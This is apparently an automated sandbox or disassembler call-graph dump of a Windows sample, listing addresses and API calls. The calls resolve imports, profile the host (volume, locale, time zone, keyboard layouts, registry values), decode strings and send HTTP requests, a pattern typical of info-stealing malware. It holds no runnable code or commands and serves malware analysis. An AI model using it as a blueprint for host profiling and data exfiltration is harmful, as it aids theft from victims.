105627->105628 105629 403f0a 105628->105629 105630 404610 34 API calls 105629->105630 105631 403f23 105630->105631 105632 404610 34 API calls 105631->105632 105633 403f3c 105632->105633 105634 404610 34 API calls 105633->105634 105635 403f55 105634->105635 105636 404610 34 API calls 105635->105636 105637 403f6e 105636->105637 105638 404610 34 API calls 105637->105638 105639 403f87 105638->105639 105640 404610 34 API calls 105639->105640 105641 403fa0 105640->105641 105642 404610 34 API calls 105641->105642 105643 403fb9 105642->105643 105644 404610 34 API calls 105643->105644 105645 403fd2 105644->105645 105646 404610 34 API calls 105645->105646 105647 403feb 105646->105647 105648 404610 34 API calls 105647->105648 105649 404004 105648->105649 105650 404610 34 API calls 105649->105650 105651 40401d 105650->105651 105652 404610 34 API calls 105651->105652 105653 404036 105652->105653 105654 404610 34 API calls 105653->105654 105655 40404f 105654->105655 105656 404610 34 API calls 105655->105656 105657 404068 105656->105657 105658 404610 34 API calls 105657->105658 105659 404081 105658->105659 105660 404610 34 API calls 105659->105660 105661 40409a 105660->105661 105662 404610 34 API calls 105661->105662 105663 4040b3 105662->105663 105664 404610 34 API calls 105663->105664 105665 4040cc 105664->105665 105666 404610 34 API calls 105665->105666 105667 4040e5 105666->105667 105668 404610 34 API calls 105667->105668 105669 4040fe 105668->105669 105670 404610 34 API calls 105669->105670 105671 404117 105670->105671 105672 404610 34 API calls 105671->105672 105673 404130 105672->105673 105674 404610 34 API calls 105673->105674 105675 404149 105674->105675 105676 404610 34 API calls 105675->105676 105677 404162 105676->105677 105678 404610 34 API calls 105677->105678 105679 40417b 105678->105679 105680 404610 34 API calls 105679->105680 105681 404194 105680->105681 105682 404610 34 API calls 105681->105682 105683 4041ad 105682->105683 105684 404610 34 API calls 105683->105684 105685 4041c6 105684->105685 105686 404610 34 API calls 105685->105686 105687 4041df 105686->105687 105688 404610 34 API calls 105687->105688 105689 4041f8 105688->105689 105690 404610 34 API calls 105689->105690 105691 404211 105690->105691 105692 404610 34 API calls 105691->105692 105693 40422a 105692->105693 105694 404610 34 API calls 105693->105694 105695 404243 105694->105695 105696 404610 34 API calls 105695->105696 105697 40425c 105696->105697 105698 404610 34 API calls 105697->105698 105699 404275 105698->105699 105700 404610 34 API calls 105699->105700 105701 40428e 105700->105701 105702 404610 34 API calls 105701->105702 105703 4042a7 105702->105703 105704 404610 34 API calls 105703->105704 105705 4042c0 105704->105705 105706 404610 34 API calls 105705->105706 105707 4042d9 105706->105707 105708 404610 34 API calls 105707->105708 105709 4042f2 105708->105709 105710 404610 34 API calls 105709->105710 105711 40430b 105710->105711 105712 404610 34 API calls 105711->105712 105713 404324 105712->105713 105714 404610 34 API calls 105713->105714 105715 40433d 105714->105715 105716 404610 34 API calls 105715->105716 105717 404356 105716->105717 105718 404610 34 API calls 105717->105718 105719 40436f 105718->105719 105720 404610 34 API calls 105719->105720 105721 404388 105720->105721 105722 404610 34 API calls 105721->105722 105723 4043a1 105722->105723 105724 404610 34 API calls 105723->105724 105725 4043ba 105724->105725 105726 404610 34 API calls 105725->105726 105727 4043d3 105726->105727 105728 404610 34 API calls 105727->105728 105729 4043ec 105728->105729 105730 404610 34 API calls 105729->105730 105731 404405 105730->105731 105732 404610 34 API calls 105731->105732 105733 40441e 105732->105733 105734 404610 34 API calls 105733->105734 105735 404437 105734->105735 105736 404610 34 API calls 105735->105736 105737 404450 105736->105737 105738 404610 34 API calls 105737->105738 105739 404469 105738->105739 105740 404610 34 API calls 105739->105740 105741 404482 105740->105741 105742 404610 34 API calls 105741->105742 105743 40449b 105742->105743 105744 404610 34 API calls 105743->105744 105745 4044b4 105744->105745 105746 404610 34 API calls 105745->105746 105747 4044cd 105746->105747 105748 404610 34 API calls 105747->105748 105749 4044e6 105748->105749 105750 404610 34 API calls 105749->105750 105751 4044ff 105750->105751 105752 404610 34 API calls 105751->105752 105753 404518 105752->105753 105754 404610 34 API calls 105753->105754 105755 404531 105754->105755 105756 404610 34 API calls 105755->105756 105757 40454a 105756->105757 105758 404610 34 API calls 105757->105758 105759 404563 105758->105759 105760 404610 34 API calls 105759->105760 105761 40457c 105760->105761 105762 404610 34 API calls 105761->105762 105763 404595 105762->105763 105764 404610 34 API calls 105763->105764 105765 4045ae 105764->105765 105766 404610 34 API calls 105765->105766 105767 4045c7 105766->105767 105768 404610 34 API calls 105767->105768 105769 4045e0 105768->105769 105770 404610 34 API calls 105769->105770 105771 4045f9 105770->105771 105772 419f20 105771->105772 105773 419f30 43 API calls 105772->105773 105774 41a346 8 API calls 105772->105774 105773->105774 105775 41a456 105774->105775 105776 41a3dc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 105774->105776 105777 41a463 8 API calls 105775->105777 105778 41a526 105775->105778 105776->105775 105777->105778 105779 41a5a8 105778->105779 105780 41a52f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 105778->105780 105781 41a5b5 6 API calls 105779->105781 105782 41a647 105779->105782 105780->105779 105781->105782 105783 41a654 9 API calls 105782->105783 105784 41a72f 105782->105784 105783->105784 105785 41a7b2 105784->105785 105786 41a738 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 105784->105786 105787 41a7bb GetProcAddress GetProcAddress 105785->105787 105788 41a7ec 105785->105788 105786->105785 105787->105788 105789 41a825 105788->105789 105790 41a7f5 GetProcAddress GetProcAddress 105788->105790 105791 41a922 105789->105791 105792 41a832 10 API calls 105789->105792 105790->105789 105793 41a92b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 105791->105793 105794 41a98d 105791->105794 105792->105791 105793->105794 105795 41a996 GetProcAddress 105794->105795 105796 41a9ae 105794->105796 105795->105796 105797 41a9b7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 105796->105797 105798 415ef3 105796->105798 105797->105798 105799 401590 105798->105799 106898 4016b0 105799->106898 105802 41aab0 lstrcpy 105803 4015b5 105802->105803 105804 41aab0 lstrcpy 105803->105804 105805 4015c7 105804->105805 105806 41aab0 lstrcpy 105805->105806 105807 4015d9 105806->105807 105808 41aab0 lstrcpy 105807->105808 105809 401663 105808->105809 105810 415760 105809->105810 105811 415771 105810->105811 105812 41ab30 2 API calls 105811->105812 105813 41577e 105812->105813 105814 41ab30 2 API calls 105813->105814 105815 41578b 105814->105815 105816 41ab30 2 API calls 105815->105816 105817 415798 105816->105817 105818 41aa50 lstrcpy 105817->105818 105819 4157a5 105818->105819 105820 41aa50 lstrcpy 105819->105820 105821 4157b2 105820->105821 105822 41aa50 lstrcpy 105821->105822 105823 4157bf 105822->105823 105824 41aa50 lstrcpy 105823->105824 105839 4157cc 105824->105839 105825 41aa50 lstrcpy 105825->105839 105826 41ab30 lstrlenA lstrcpy 105826->105839 105827 415893 StrCmpCA 105827->105839 105828 4158f0 StrCmpCA 105830 415a2c 105828->105830 105828->105839 105829 41aab0 lstrcpy 105829->105839 105831 41abb0 lstrcpy 105830->105831 105832 415a38 105831->105832 105833 41ab30 2 API calls 105832->105833 105835 415a46 105833->105835 105834 415440 23 API calls 105834->105839 105838 41ab30 2 API calls 105835->105838 105836 415aa6 StrCmpCA 105837 415be1 105836->105837 105836->105839 105840 41abb0 lstrcpy 105837->105840 105841 415a55 105838->105841 105839->105825 105839->105826 105839->105827 105839->105828 105839->105829 105839->105834 105839->105836 105845 415c5b StrCmpCA 105839->105845 105846 415510 29 API calls 105839->105846 105859 4159da StrCmpCA 105839->105859 105862 415b8f StrCmpCA 105839->105862 105863 41abb0 lstrcpy 105839->105863 105864 401590 lstrcpy 105839->105864 105842 415bed 105840->105842 105843 4016b0 lstrcpy 105841->105843 105844 41ab30 2 API calls 105842->105844 105861 415a61 105843->105861 105847 415bfb 105844->105847 105848 415c66 Sleep 105845->105848 105849 415c78 105845->105849 105846->105839 105850 41ab30 2 API calls 105847->105850 105848->105839 105851 41abb0 lstrcpy 105849->105851 105852 415c0a 105850->105852 105854 415c84 105851->105854 105853 4016b0 lstrcpy 105852->105853 105853->105861 105855 41ab30 2 API calls 105854->105855 105856 415c93 105855->105856 105857 41ab30 2 API calls 105856->105857 105858 415ca2 105857->105858 105860 4016b0 lstrcpy 105858->105860 105859->105839 105860->105861 105861->104917 105862->105839 105863->105839 105864->105839 105866 4176e3 GetVolumeInformationA 105865->105866 105867 4176dc 105865->105867 105868 417721 105866->105868 105867->105866 105869 41778c GetProcessHeap HeapAlloc 105868->105869 105870 4177a9 105869->105870 105871 4177b8 wsprintfA 105869->105871 105872 41aa50 lstrcpy 105870->105872 105873 41aa50 lstrcpy 105871->105873 105874 415ff7 105872->105874 105873->105874 105874->104938 105876 41aab0 lstrcpy 105875->105876 105877 4048e9 105876->105877 106907 404800 105877->106907 105879 4048f5 105880 41aa50 lstrcpy 105879->105880 105881 404927 105880->105881 105882 41aa50 lstrcpy 105881->105882 105883 404934 105882->105883 105884 41aa50 lstrcpy 105883->105884 105885 404941 105884->105885 105886 41aa50 lstrcpy 105885->105886 105887 40494e 105886->105887 105888 41aa50 lstrcpy 105887->105888 105889 40495b InternetOpenA StrCmpCA 105888->105889 105890 404994 105889->105890 105891 404f1b InternetCloseHandle 105890->105891 106915 418cf0 105890->106915 105892 404f38 105891->105892 106930 40a210 CryptStringToBinaryA 105892->106930 105894 4049b3 106923 41ac30 105894->106923 105897 4049c6 105899 41abb0 lstrcpy 105897->105899 105904 4049cf 105899->105904 105900 41ab30 2 API calls 105901 404f55 105900->105901 105902 41acc0 4 API calls 105901->105902 105905 404f6b 105902->105905 105903 404f77 moneypunct 105906 41aab0 lstrcpy 105903->105906 105908 41acc0 4 API calls 105904->105908 105907 41abb0 lstrcpy 105905->105907 105912 404fa7 105906->105912 105907->105903 105909 4049f9 105908->105909 105910 41abb0 lstrcpy 105909->105910 105911 404a02 105910->105911 105913 41acc0 4 API calls 105911->105913 105912->104941 105914 404a21 105913->105914 105915 41abb0 lstrcpy 105914->105915 105916 404a2a 105915->105916 105917 41ac30 3 API calls 105916->105917 105918 404a48 105917->105918 105919 41abb0 lstrcpy 105918->105919 105920 404a51 105919->105920 105921 41acc0 4 API calls 105920->105921 105922 404a70 105921->105922 105923 41abb0 lstrcpy 105922->105923 105924 404a79 105923->105924 105925 41acc0 4 API calls 105924->105925 105926 404a98 105925->105926 105927 41abb0 lstrcpy 105926->105927 105928 404aa1 105927->105928 105929 41acc0 4 API calls 105928->105929 105930 404acd 105929->105930 105931 41ac30 3 API calls 105930->105931 105932 404ad4 105931->105932 105933 41abb0 lstrcpy 105932->105933 105934 404add 105933->105934 105935 404af3 InternetConnectA 105934->105935 105935->105891 105936 404b23 HttpOpenRequestA 105935->105936 105938 404b78 105936->105938 105939 404f0e InternetCloseHandle 105936->105939 105940 41acc0 4 API calls 105938->105940 105939->105891 105941 404b8c 105940->105941 105942 41abb0 lstrcpy 105941->105942 105943 404b95 105942->105943 105944 41ac30 3 API calls 105943->105944 105945 404bb3 105944->105945 105946 41abb0 lstrcpy 105945->105946 105947 404bbc 105946->105947 105948 41acc0 4 API calls 105947->105948 105949 404bdb 105948->105949 105950 41abb0 lstrcpy 105949->105950 105951 404be4 105950->105951 105952 41acc0 4 API calls 105951->105952 105953 404c05 105952->105953 105954 41abb0 lstrcpy 105953->105954 105955 404c0e 105954->105955 105956 41acc0 4 API calls 105955->105956 105957 404c2e 105956->105957 105958 41abb0 lstrcpy 105957->105958 105959 404c37 105958->105959 105960 41acc0 4 API calls 105959->105960 105961 404c56 105960->105961 105962 41abb0 lstrcpy 105961->105962 105963 404c5f 105962->105963 105964 41ac30 3 API calls 105963->105964 105965 404c7d 105964->105965 105966 41abb0 lstrcpy 105965->105966 105967 404c86 105966->105967 105968 41acc0 4 API calls 105967->105968 105969 404ca5 105968->105969 105970 41abb0 lstrcpy 105969->105970 105971 404cae 105970->105971 105972 41acc0 4 API calls 105971->105972 105973 404ccd 105972->105973 105974 41abb0 lstrcpy 105973->105974 105975 404cd6 105974->105975 105976 41ac30 3 API calls 105975->105976 105977 404cf4 105976->105977 105978 41abb0 lstrcpy 105977->105978 105979 404cfd 105978->105979 105980 41acc0 4 API calls 105979->105980 105981 404d1c 105980->105981 105982 41abb0 lstrcpy 105981->105982 105983 404d25 105982->105983 105984 41acc0 4 API calls 105983->105984 105985 404d46 105984->105985 105986 41abb0 lstrcpy 105985->105986 105987 404d4f 105986->105987 105988 41acc0 4 API calls 105987->105988 105989 404d6f 105988->105989 105990 41abb0 lstrcpy 105989->105990 105991 404d78 105990->105991 105992 41acc0 4 API calls 105991->105992 105993 404d97 105992->105993 105994 41abb0 lstrcpy 105993->105994 105995 404da0 105994->105995 105996 41ac30 3 API calls 105995->105996 105997 404dbe 105996->105997 105998 41abb0 lstrcpy 105997->105998 105999 404dc7 105998->105999 106000 41aa50 lstrcpy 105999->106000 106001 404de2 106000->106001 106002 41ac30 3 API calls 106001->106002 106003 404e03 106002->106003 106004 41ac30 3 API calls 106003->106004 106005 404e0a 106004->106005 106006 41abb0 lstrcpy 106005->106006 106007 404e16 106006->106007 106008 404e37 lstrlenA 106007->106008 106009 404e4a 106008->106009 106010 404e53 lstrlenA 106009->106010 106929 41ade0 106010->106929 106012 404e63 HttpSendRequestA 106013 404e82 InternetReadFile 106012->106013 106014 404eb7 InternetCloseHandle 106013->106014 106019 404eae 106013->106019 106017 41ab10 106014->106017 106016 41acc0 4 API calls 106016->106019 106017->105939 106018 41abb0 lstrcpy 106018->106019 106019->106013 106019->106014 106019->106016 106019->106018 106939 41ade0 106020->106939 106022 411a14 StrCmpCA 106023 411a27 106022->106023 106024 411a1f ExitProcess 106022->106024 106025 411a37 strtok_s 106023->106025 106039 411a44 106025->106039 106026 411c12 106026->104943 106027 411bee strtok_s 106027->106039 106028 411b41 StrCmpCA 106028->106039 106029 411ba1 StrCmpCA 106029->106039 106030 411bc0 StrCmpCA 106030->106039 106031 411b63 StrCmpCA 106031->106039 106032 411b82 StrCmpCA 106032->106039 106033 411aad StrCmpCA 106033->106039 106034 411acf StrCmpCA 106034->106039 106035 411afd StrCmpCA 106035->106039 106036 411b1f StrCmpCA 106036->106039 106037 41ab30 lstrlenA lstrcpy 106037->106039 106038 41ab30 2 API calls 106038->106027 106039->106026 106039->106027 106039->106028 106039->106029 106039->106030 106039->106031 106039->106032 106039->106033 106039->106034 106039->106035 106039->106036 106039->106037 106039->106038 106041 41aab0 lstrcpy 106040->106041 106042 4059c9 106041->106042 106043 404800 5 API calls 106042->106043 106044 4059d5 106043->106044 106045 41aa50 lstrcpy 106044->106045 106046 405a0a 106045->106046 106047 41aa50 lstrcpy 106046->106047 106048 405a17 106047->106048 106049 41aa50 lstrcpy 106048->106049 106050 405a24 106049->106050 106051 41aa50 lstrcpy 106050->106051 106052 405a31 106051->106052 106053 41aa50 lstrcpy 106052->106053 106054 405a3e InternetOpenA StrCmpCA 106053->106054 106055 405a6d 106054->106055 106056 406013 InternetCloseHandle 106055->106056 106058 418cf0 3 API calls 106055->106058 106057 406030 106056->106057 106060 40a210 4 API calls 106057->106060 106059 405a8c 106058->106059 106061 41ac30 3 API calls 106059->106061 106062 406036 106060->106062 106063 405a9f 106061->106063 106065 41ab30 2 API calls 106062->106065 106067 40606f moneypunct 106062->106067 106064 41abb0 lstrcpy 106063->106064 106070 405aa8 106064->106070 106066 40604d 106065->106066 106068 41acc0 4 API calls 106066->106068 106071 41aab0 lstrcpy 106067->106071 106069 406063 106068->106069 106072 41abb0 lstrcpy 106069->106072 106073 41acc0 4 API calls 106070->106073 106081 40609f 106071->106081 106072->106067 106074 405ad2 106073->106074 106075 41abb0 lstrcpy 106074->106075 106076 405adb 106075->106076 106077 41acc0 4 API calls 106076->106077 106078 405afa 106077->106078 106079 41abb0 lstrcpy 106078->106079 106080 405b03 106079->106080 106082 41ac30 3 API calls 106080->106082 106081->104949 106083 405b21 106082->106083 106084 41abb0 lstrcpy 106083->106084 106085 405b2a 106084->106085 106086 41acc0 4 API calls 106085->106086 106087 405b49 106086->106087 106088 41abb0 lstrcpy 106087->106088 106089 405b52 106088->106089 106090 41acc0 4 API calls 106089->106090 106091 405b71 106090->106091 106092 41abb0 lstrcpy 106091->106092 106093 405b7a 106092->106093 106094 41acc0 4 API calls 106093->106094 106095 405ba6 106094->106095 106096 41ac30 3 API calls 106095->106096 106097 405bad 106096->106097 106098 41abb0 lstrcpy 106097->106098 106099 405bb6 106098->106099 106100 405bcc InternetConnectA 106099->106100 106100->106056 106101 405bfc HttpOpenRequestA 106100->106101 106103 406006 InternetCloseHandle 106101->106103 106104 405c5b 106101->106104 106103->106056 106105 41acc0 4 API calls 106104->106105 106106 405c6f 106105->106106 106107 41abb0 lstrcpy 106106->106107 106108 405c78 106107->106108 106109 41ac30 3 API calls 106108->106109 106110 405c96 106109->106110 106111 41abb0 lstrcpy 106110->106111 106112 405c9f 106111->106112 106113 41acc0 4 API calls 106112->106113 106114 405cbe 106113->106114 106115 41abb0 lstrcpy 106114->106115 106116 405cc7 106115->106116 106117 41acc0 4 API calls 106116->106117 106118 405ce8 106117->106118 106119 41abb0 lstrcpy 106118->106119 106120 405cf1 106119->106120 106121 41acc0 4 API calls 106120->106121 106122 405d11 106121->106122 106123 41abb0 lstrcpy 106122->106123 106124 405d1a 106123->106124 106125 41acc0 4 API calls 106124->106125 106126 405d39 106125->106126 106127 41abb0 lstrcpy 106126->106127 106128 405d42 106127->106128 106129 41ac30 3 API calls 106128->106129 106130 405d60 106129->106130 106131 41abb0 lstrcpy 106130->106131 106132 405d69 106131->106132 106133 41acc0 4 API calls 106132->106133 106134 405d88 106133->106134 106135 41abb0 lstrcpy 106134->106135 106136 405d91 106135->106136 106137 41acc0 4 API calls 106136->106137 106138 405db0 106137->106138 106139 41abb0 lstrcpy 106138->106139 106140 405db9 106139->106140 106141 41ac30 3 API calls 106140->106141 106142 405dd7 106141->106142 106143 41abb0 lstrcpy 106142->106143 106144 405de0 106143->106144 106145 41acc0 4 API calls 106144->106145 106146 405dff 106145->106146 106147 41abb0 lstrcpy 106146->106147 106148 405e08 106147->106148 106149 41acc0 4 API calls 106148->106149 106150 405e29 106149->106150 106151 41abb0 lstrcpy 106150->106151 106152 405e32 106151->106152 106153 41acc0 4 API calls 106152->106153 106154 405e52 106153->106154 106155 41abb0 lstrcpy 106154->106155 106156 405e5b 106155->106156 106157 41acc0 4 API calls 106156->106157 106158 405e7a 106157->106158 106159 41abb0 lstrcpy 106158->106159 106160 405e83 106159->106160 106161 41ac30 3 API calls 106160->106161 106162 405ea4 106161->106162 106163 41abb0 lstrcpy 106162->106163 106164 405ead 106163->106164 106165 405ec0 lstrlenA 106164->106165 106940 41ade0 106165->106940 106167 405ed1 lstrlenA GetProcessHeap HeapAlloc 106941 41ade0 106167->106941 106169 405efe lstrlenA 106942 41ade0 106169->106942 106171 405f0e memcpy 106943 41ade0 106171->106943 106173 405f27 lstrlenA 106174 405f37 106173->106174 106175 405f40 lstrlenA memcpy 106174->106175 106944 41ade0 106175->106944 106177 405f6a lstrlenA 106945 41ade0 106177->106945 106179 405f7a HttpSendRequestA 106180 405f85 InternetReadFile 106179->106180 106181 405fba InternetCloseHandle 106180->106181 106185 405fb1 106180->106185 106181->106103 106183 41acc0 4 API calls 106183->106185 106184 41abb0 lstrcpy 106184->106185 106185->106180 106185->106181 106185->106183 106185->106184 106946 41ade0 106186->106946 106188 4112a7 strtok_s 106190 4112b4 106188->106190 106189 41139f 106189->104951 106190->106189 106191 41137b strtok_s 106190->106191 106192 41ab30 lstrlenA lstrcpy 106190->106192 106191->106190 106192->106190 106947 41ade0 106193->106947 106195 410fe7 strtok_s 106198 410ff4 106195->106198 106196 411147 106196->104959 106197 411123 strtok_s 106197->106198 106198->106196 106198->106197 106199 4110d4 StrCmpCA 106198->106199 106200 411057 StrCmpCA 106198->106200 106201 411097 StrCmpCA 106198->106201 106202 41ab30 lstrlenA lstrcpy 106198->106202 106199->106198 106200->106198 106201->106198 106202->106198 106948 41ade0 106203->106948 106205 411197 strtok_s 106209 4111a4 106205->106209 106206 411274 106206->104967 106207 4111e2 StrCmpCA 106207->106209 106208 41ab30 lstrlenA lstrcpy 106208->106209 106209->106206 106209->106207 106209->106208 106210 411250 strtok_s 106209->106210 106210->106209 106212 41aa50 lstrcpy 106211->106212 106213 411c76 106212->106213 106214 41acc0 4 API calls 106213->106214 106215 411c87 106214->106215 106216 41abb0 lstrcpy 106215->106216 106217 411c90 106216->106217 106218 41acc0 4 API calls 106217->106218 106219 411cab 106218->106219 106220 41abb0 lstrcpy 106219->106220 106221 411cb4 106220->106221 106222 41acc0 4 API calls 106221->106222 106223 411ccd 106222->106223 106224 41abb0 lstrcpy 106223->106224 106225 411cd6 106224->106225 106226 41acc0 4 API calls 106225->106226 106227 411cf1 106226->106227 106228 41abb0 lstrcpy 106227->106228 106229 411cfa 106228->106229 106230 41acc0 4 API calls 106229->106230 106231 411d13 106230->106231 106232 41abb0 lstrcpy 106231->106232 106233 411d1c 106232->106233 106234 41acc0 4 API calls 106233->106234 106235 411d37 106234->106235 106236 41abb0 lstrcpy 106235->106236 106237 411d40 106236->106237 106238 41acc0 4 API calls 106237->106238 106239 411d59 106238->106239 106240 41abb0 lstrcpy 106239->106240 106241 411d62 106240->106241 106242 41acc0 4 API calls 106241->106242 106243 411d7d 106242->106243 106244 41abb0 lstrcpy 106243->106244 106245 411d86 106244->106245 106246 41acc0 4 API calls 106245->106246 106247 411d9f 106246->106247 106248 41abb0 lstrcpy 106247->106248 106249 411da8 106248->106249 106250 41acc0 4 API calls 106249->106250 106251 411dc6 106250->106251 106252 41abb0 lstrcpy 106251->106252 106253 411dcf 106252->106253 106254 417690 6 API calls 106253->106254 106255 411de6 106254->106255 106256 41ac30 3 API calls 106255->106256 106257 411df9 106256->106257 106258 41abb0 lstrcpy 106257->106258 106259 411e02 106258->106259 106260 41acc0 4 API calls 106259->106260 106261 411e2c 106260->106261 106262 41abb0 lstrcpy 106261->106262 106263 411e35 106262->106263 106264 41acc0 4 API calls 106263->106264 106265 411e55 106264->106265 106266 41abb0 lstrcpy 106265->106266 106267 411e5e 106266->106267 106949 417820 GetProcessHeap HeapAlloc 106267->106949 106270 41acc0 4 API calls 106271 411e7e 106270->106271 106272 41abb0 lstrcpy 106271->106272 106273 411e87 106272->106273 106274 41acc0 4 API calls 106273->106274 106275 411ea6 106274->106275 106276 41abb0 lstrcpy 106275->106276 106277 411eaf 106276->106277 106278 41acc0 4 API calls 106277->106278 106279 411ed0 106278->106279 106280 41abb0 lstrcpy 106279->106280 106281 411ed9 106280->106281 106956 417950 GetCurrentProcess IsWow64Process 106281->106956 106284 41acc0 4 API calls 106285 411ef9 106284->106285 106286 41abb0 lstrcpy 106285->106286 106287 411f02 106286->106287 106288 41acc0 4 API calls 106287->106288 106289 411f21 106288->106289 106290 41abb0 lstrcpy 106289->106290 106291 411f2a 106290->106291 106292 41acc0 4 API calls 106291->106292 106293 411f4b 106292->106293 106294 41abb0 lstrcpy 106293->106294 106295 411f54 106294->106295 106296 4179e0 3 API calls 106295->106296 106297 411f64 106296->106297 106298 41acc0 4 API calls 106297->106298 106299 411f74 106298->106299 106300 41abb0 lstrcpy 106299->106300 106301 411f7d 106300->106301 106302 41acc0 4 API calls 106301->106302 106303 411f9c 106302->106303 106304 41abb0 lstrcpy 106303->106304 106305 411fa5 106304->106305 106306 41acc0 4 API calls 106305->106306 106307 411fc5 106306->106307 106308 41abb0 lstrcpy 106307->106308 106309 411fce 106308->106309 106310 417a70 3 API calls 106309->106310 106311 411fde 106310->106311 106312 41acc0 4 API calls 106311->106312 106313 411fee 106312->106313 106314 41abb0 lstrcpy 106313->106314 106315 411ff7 106314->106315 106316 41acc0 4 API calls 106315->106316 106317 412016 106316->106317 106318 41abb0 lstrcpy 106317->106318 106319 41201f 106318->106319 106320 41acc0 4 API calls 106319->106320 106321 412040 106320->106321 106322 41abb0 lstrcpy 106321->106322 106323 412049 106322->106323 106958 417b10 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 106323->106958 106326 41acc0 4 API calls 106327 412069 106326->106327 106328 41abb0 lstrcpy 106327->106328 106329 412072 106328->106329 106330 41acc0 4 API calls 106329->106330 106331 412091 106330->106331 106332 41abb0 lstrcpy 106331->106332 106333 41209a 106332->106333 106334 41acc0 4 API calls 106333->106334 106335 4120bb 106334->106335 106336 41abb0 lstrcpy 106335->106336 106337 4120c4 106336->106337 106960 417bc0 GetProcessHeap HeapAlloc GetTimeZoneInformation 106337->106960 106340 41acc0 4 API calls 106341 4120e4 106340->106341 106342 41abb0 lstrcpy 106341->106342 106343 4120ed 106342->106343 106344 41acc0 4 API calls 106343->106344 106345 41210c 106344->106345 106346 41abb0 lstrcpy 106345->106346 106347 412115 106346->106347 106348 41acc0 4 API calls 106347->106348 106349 412135 106348->106349 106350 41abb0 lstrcpy 106349->106350 106351 41213e 106350->106351 106963 417c90 GetUserDefaultLocaleName 106351->106963 106354 41acc0 4 API calls 106355 41215e 106354->106355 106356 41abb0 lstrcpy 106355->106356 106357 412167 106356->106357 106358 41acc0 4 API calls 106357->106358 106359 412186 106358->106359 106360 41abb0 lstrcpy 106359->106360 106361 41218f 106360->106361 106362 41acc0 4 API calls 106361->106362 106363 4121b0 106362->106363 106364 41abb0 lstrcpy 106363->106364 106365 4121b9 106364->106365 106968 417d20 106365->106968 106367 4121d0 106368 41ac30 3 API calls 106367->106368 106369 4121e3 106368->106369 106370 41abb0 lstrcpy 106369->106370 106371 4121ec 106370->106371 106372 41acc0 4 API calls 106371->106372 106373 412216 106372->106373 106374 41abb0 lstrcpy 106373->106374 106375 41221f 106374->106375 106376 41acc0 4 API calls 106375->106376 106377 41223f 106376->106377 106899 41aab0 lstrcpy 106898->106899 106900 4016c3 106899->106900 106901 41aab0 lstrcpy 106900->106901 106902 4016d5 106901->106902 106903 41aab0 lstrcpy 106902->106903 106904 4016e7 106903->106904 106905 41aab0 lstrcpy 106904->106905 106906 4015a3 106905->106906 106906->105802 106935 401030 106907->106935 106911 404888 lstrlenA 106938 41ade0 106911->106938 106913 404898 InternetCrackUrlA 106914 4048b7 106913->106914 106914->105879 106916 41aa50 lstrcpy 106915->106916 106917 418d04 106916->106917 106918 41aa50 lstrcpy 106917->106918 106919 418d12 GetSystemTime 106918->106919 106921 418d29 106919->106921 106920 41aab0 lstrcpy 106922 418d8c 106920->106922 106921->106920 106922->105894 106924 41ac41 106923->106924 106925 41ac98 106924->106925 106927 41ac78 lstrcpy lstrcatA 106924->106927 106926 41aab0 lstrcpy 106925->106926 106928 41aca4 106926->106928 106927->106925 106928->105897 106929->106012 106931 40a249 LocalAlloc 106930->106931 106932 404f3e 106930->106932 106931->106932 106933 40a264 CryptStringToBinaryA 106931->106933 106932->105900 106932->105903 106933->106932 106934 40a289 LocalFree 106933->106934 106934->106932 106936 40103a ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 106935->106936 106937 41ade0 106936->106937 106937->106911 106938->106913 106939->106022 106940->106167 106941->106169 106942->106171 106943->106173 106944->106177 106945->106179 106946->106188 106947->106195 106948->106205 107080 417930 106949->107080 106952 417856 RegOpenKeyExA 106954 417894 RegCloseKey 106952->106954 106955 417877 RegQueryValueExA 106952->106955 106953 411e6e 106953->106270 106954->106953 106955->106954 106957 411ee9 106956->106957 106957->106284 106959 412059 106958->106959 106959->106326 106961 4120d4 106960->106961 106962 417c2a wsprintfA 106960->106962 106961->106340 106962->106961 106964 41214e 106963->106964 106965 417cdd 106963->106965 106964->106354 107087 418eb0 LocalAlloc CharToOemW 106965->107087 106967 417ce9 106967->106964 106969 41aa50 lstrcpy 106968->106969 106970 417d5c GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 106969->106970 106978 417db5 106970->106978 106971 417dd6 GetLocaleInfoA 106971->106978 106972 417ea8 106973 417eb8 106972->106973 106974 417eae LocalFree 106972->106974 106975 41aab0 lstrcpy 106973->106975 106974->106973 106979 417ec7 106975->106979 106976 41acc0 lstrcpy lstrlenA lstrcpy lstrcatA 106976->106978 106977 41abb0 lstrcpy 106977->106978 106978->106971 106978->106972 106978->106976 106978->106977 106979->106367 107083 4178b0 GetProcessHeap HeapAlloc RegOpenKeyExA 107080->107083 107082 417849 107082->106952 107082->106953 107084 417910 RegCloseKey 107083->107084 107085 4178f5 RegQueryValueExA 107083->107085 107086 417923 107084->107086 107085->107084 107086->107082 107087->106967 108919 61e7f656 108920 61e7f6ad 108919->108920 108923 61e16404 free 108920->108923 108922 61e7f6c4 108923->108922 108924 61e597a7 108925 61e597b4 108924->108925 108926 61e597c4 108924->108926 108944 61e1aec6 free malloc 108925->108944 108934 61e15172 108926->108934 108929 61e59863 108933 61e5ae99 108929->108933 108946 61e165a3 free 108929->108946 108931 61e59804 108931->108929 108945 61e1a7b6 free malloc 108931->108945 108935 61e1517b 108934->108935 108936 61e1522e 108935->108936 108937 61e151bd 108935->108937 108939 61e0cb60 27 API calls 108935->108939 108936->108931 108947 61e0cb60 108937->108947 108939->108937 108940 61e151db 108940->108936 108941 61e0cb60 27 API calls 108940->108941 108942 61e15206 108941->108942 108942->108936 108943 61e0cb60 27 API calls 108942->108943 108943->108936 108944->108926 108945->108929 108946->108933 108948 61e0cca6 108947->108948 108949 61e0cb68 108947->108949 108948->108940 108950 61e0cb7b 108949->108950 108951 61e0cb60 27 API calls 108949->108951 108953 61e75f1f 108949->108953 108950->108940 108951->108949 108954 61e75f53 108953->108954 108964 61e75fd0 108953->108964 108955 61e75fa8 108954->108955 108954->108964 108997 61e1aaa4 free malloc 108954->108997 108955->108964 108988 61e1af14 108955->108988 108959 61e761a9 108998 61e1a7b6 free malloc 108959->108998 108960 61e76667 108960->108964 109007 61e1a7b6 free malloc 108960->109007 108964->108949 108965 61e76150 108999 61e1a7b6 free malloc 108965->108999 